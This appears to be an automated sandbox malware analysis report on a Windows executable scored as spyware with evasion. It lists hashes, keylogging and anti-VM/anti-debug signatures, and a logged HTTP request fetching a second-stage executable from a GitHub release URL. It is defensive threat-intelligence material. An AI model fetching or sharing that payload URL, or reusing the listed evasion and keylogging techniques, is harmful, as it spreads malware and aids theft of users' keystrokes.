Windows Analysis Report
SecuriteInfo.com.FileRepMalware.1111.23697.exe

Overview

General Information

Sample name: SecuriteInfo.com.FileRepMalware.1111.23697.exe
Analysis ID: 1467925
MD5: d4d645cb0c89359d63a331158cb81eed
SHA1: d05da1f86a6de7d2fcb6c6e87aa7390ced599b63
SHA256: 5817ef3fabfb94cb2458ef826416d99a14f9633239bd4959b3bf3a6ec4c20731
Tags: exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to register a low level keyboard hook
Creates HTML files with .exe extension (expired dropper behavior)
Detected VMProtect packer
Hides threads from debuggers
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Sample or dropped binary is a compiled AutoHotkey binary
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by executing a special instruction (VM detection)
AV process strings found (often used to terminate AV products)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate keystroke presses
Detected potential crypto function
Entry point lies outside standard sections
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Avira: detected
Source: https://github.careers Avira URL Cloud: Label: malware
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe ReversingLabs: Detection: 79%
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Virustotal: Detection: 73%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Joe Sandbox ML: detected
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004757E0 __fassign,FindFirstFileA,FindClose,FindFirstFileA, 0_2_004757E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0070D95B FindFirstFileA, 0_2_0070D95B

Networking

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe File created: netcomp.exe.0.dr
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00452C79 InternetReadFileExA,InternetCloseHandle, 0_2_00452C79
Source: global traffic HTTP traffic detected:
    GET /abuzgreksi/456/releases/download/456/123.exe HTTP/1.1
    User-Agent: AutoHotkey
    Host: github.com
    Cache-Control: no-cache
Source: netcomp.exe.0.dr String found in binary or memory: <a href="https://www.facebook.com/GitHub" class="footer-social-icon d-block Link--outlineOffset" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to Facebook&quot;,&quot;label&quot;:&quot;text:text:facebook&quot;}"> equals www.facebook.com (Facebook)
Source: netcomp.exe.0.dr String found in binary or memory: <a href="https://www.linkedin.com/company/github" class="footer-social-icon d-block Link--outlineOffset" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to Linkedin&quot;,&quot;label&quot;:&quot;text:text:linkedin&quot;}"> equals www.linkedin.com (Linkedin)
Source: netcomp.exe.0.dr String found in binary or memory: <a href="https://www.youtube.com/github" class="footer-social-icon d-block Link--outlineOffset" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to YouTube&quot;,&quot;label&quot;:&quot;text:text:youtube&quot;}"> equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: GitHub.com
    Date: Fri, 05 Jul 2024 01:36:13 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Source: Amcache.hve.0.dr String found in binary or memory: http://upx.sf.net
Source: netcomp.exe.0.dr String found in binary or memory: https://api.github.com/_private/browser/errors
Source: netcomp.exe.0.dr String found in binary or memory: https://api.github.com/_private/browser/stats
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://autohotkey.com
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://autohotkey.comCould
Source: netcomp.exe.0.dr String found in binary or memory: https://avatars.githubusercontent.com
Source: netcomp.exe.0.dr String found in binary or memory: https://cli.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://collector.github.com/github/collect
Source: netcomp.exe.0.dr String found in binary or memory: https://desktop.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://docs.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://docs.github.com/get-started/accessibility/keyboard-shortcuts
Source: netcomp.exe.0.dr String found in binary or memory: https://docs.github.com/get-started/exploring-integrations/about-building-integrations
Source: netcomp.exe.0.dr String found in binary or memory: https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax
Source: netcomp.exe.0.dr String found in binary or memory: https://docs.github.com/site-policy/github-terms/github-terms-of-service
Source: netcomp.exe.0.dr String found in binary or memory: https://docs.github.com/site-policy/privacy-policies/github-privacy-statement
Source: netcomp.exe.0.dr String found in binary or memory: https://github-cloud.s3.amazonaws.com
Source: netcomp.exe.0.dr String found in binary or memory: https://github.blog
Source: netcomp.exe.0.dr String found in binary or memory: https://github.careers
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760199708.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000003.1758902429.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, netcomp.exe.0.dr String found in binary or memory: https://github.com/
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/about
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/abuzgreksi/456/releases/download/456/123.exe
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/abuzgreksi/456/releases/download/456/123.exe&quot;
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760146944.0000000001360000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/abuzgreksi/456/releases/download/456/123.exenetcomp.exe?
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/collections
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/customer-stories
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/edu
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/enterprise
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/enterprise/advanced-security
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/enterprise/startups
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/actions
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/code-review
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/codespaces
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/copilot
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/discussions
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/issues
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/packages
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/features/security
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/fluidicon.png
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/github
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/github/roadmap
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/github/site-policy/pull/582
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/mobile
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/notifications/beta/shelf
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/pricing
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/readme
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1760199708.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000003.1758902429.00000000013C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/s
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/solutions/ci-cd
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/solutions/devops
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/solutions/devsecops
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/solutions/industries/financial-services
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/solutions/industries/healthcare
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/solutions/industries/manufacturing
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/team
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/topics
Source: netcomp.exe.0.dr String found in binary or memory: https://github.com/trending
Source: netcomp.exe.0.dr String found in binary or memory: https://github.community
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_g
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-type
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-4dd22d95
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-fd68b41b03a0.j
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/behaviors-ac844bd01e4d.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/dark-6b1e37da2254.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-a4629b2e906b.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-f4daad25d8cf.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-1911f0cf0db4.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/element-registry-cebd41dde8aa.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/environment-a36e9a1c67ad.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/error-add24e2c1056.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/github-0c7b5281bcc9.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/github-elements-a7dc71cd6e4e.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/github-mark-57519b92ca4e.png
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/global-526475a50099.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-f6d4ee842c1e.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/light-efd2f2257c96.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/light_colorblind-afcc3a6a38dd.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-79bca7145393.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-fe4137b54b26.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/mona-sans-d1bf285e9b9b.woff2
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/notifications-global-ce1721184096.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/primer-61560ce103d3.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/primer-primitives-8500c2c7ce5f.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/react-lib-a89cbd87a1e0.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/sessions-599dffba3e8f.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/site-3ab44dbdb8a0.css
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-cdd1e82b3795.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-810e4b1b9abd.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_m
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_session-resume_dist_index_js-node
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-1c
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-cc7cb714ead5.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-5a335cbe
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-83
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_Dialog_js-no
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/assets/wp-runtime-dc42d191447b.js
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/favicons/favicon.png
Source: netcomp.exe.0.dr String found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
Source: netcomp.exe.0.dr String found in binary or memory: https://githubstatus.com
Source: netcomp.exe.0.dr String found in binary or memory: https://partner.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://resources.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://resources.github.com/devops/tools/compare
Source: netcomp.exe.0.dr String found in binary or memory: https://resources.github.com/learn/pathways
Source: netcomp.exe.0.dr String found in binary or memory: https://resources.github.com/newsletter/
Source: netcomp.exe.0.dr String found in binary or memory: https://services.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://shop.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://skills.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://socialimpact.github.com
Source: netcomp.exe.0.dr String found in binary or memory: https://support.github.com?tags=dotcom-404
Source: netcomp.exe.0.dr String found in binary or memory: https://support.github.com?tags=dotcom-footer
Source: netcomp.exe.0.dr String found in binary or memory: https://twitter.com/githubstatus
Source: netcomp.exe.0.dr String found in binary or memory: https://user-images.githubusercontent.com/
Source: netcomp.exe.0.dr String found in binary or memory: https://www.electronjs.org
Source: netcomp.exe.0.dr String found in binary or memory: https://www.githubstatus.com
Source: netcomp.exe.0.dr String found in binary or memory: https://www.linkedin.com/company/github
Source: netcomp.exe.0.dr String found in binary or memory: https://www.tiktok.com/
Source: netcomp.exe.0.dr String found in binary or memory: https://www.twitch.tv/github
Source: netcomp.exe.0.dr String found in binary or memory: https://www.youtube.com/github
Source: netcomp.exe.0.dr String found in binary or memory: https://x.com/github
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004094F0 SetWindowsHookExA 0000000D,Function_00004DC0,?,00000000 0_2_004094F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004105E0 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState, 0_2_004105E0

System Summary

Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Static PE information: .vmp0 and .vmp1 section names
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Window found: window name: AutoHotkey
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0040155F 0_2_0040155F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004080E0 0_2_004080E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00492080 0_2_00492080
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004181C0 0_2_004181C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0045C340 0_2_0045C340
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00474300 0_2_00474300
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004083B0 0_2_004083B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004925D1 0_2_004925D1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00424610 0_2_00424610
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00446620 0_2_00446620
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004586D0 0_2_004586D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004CC740 0_2_004CC740
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004147A0 0_2_004147A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_004147B5 0_2_004147B5
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_00486A60 0_2_00486A60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0048F063 0_2_0048F063
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0040F65D 0_2_0040F65D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0049371D 0_2_0049371D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0049580E 0_2_0049580E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0041FAF0 0_2_0041FAF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: 0_2_0041BF10 0_2_0041BF10
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 00474A60 appears 72 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 0042FE80 appears 215 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 0048D210 appears 31 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 0042FBE0 appears 78 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 00487ED1 appears 393 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 004C8508 appears 35 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 0048828D appears 50 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Code function: String function: 00474AF0 appears 46 times
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe, 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.1111.23697.exe
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Binary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.1111.23697.exe
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.spyw.evad.winEXE@2/2@1/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe File created: C:\Users\user\Desktop\netcomp.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe ReversingLabs: Detection: 79%
Source: SecuriteInfo.com.FileRepMalware.1111.23697.exe Virustotal: Detection: 73%
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe Section loaded: rsaenh.dll
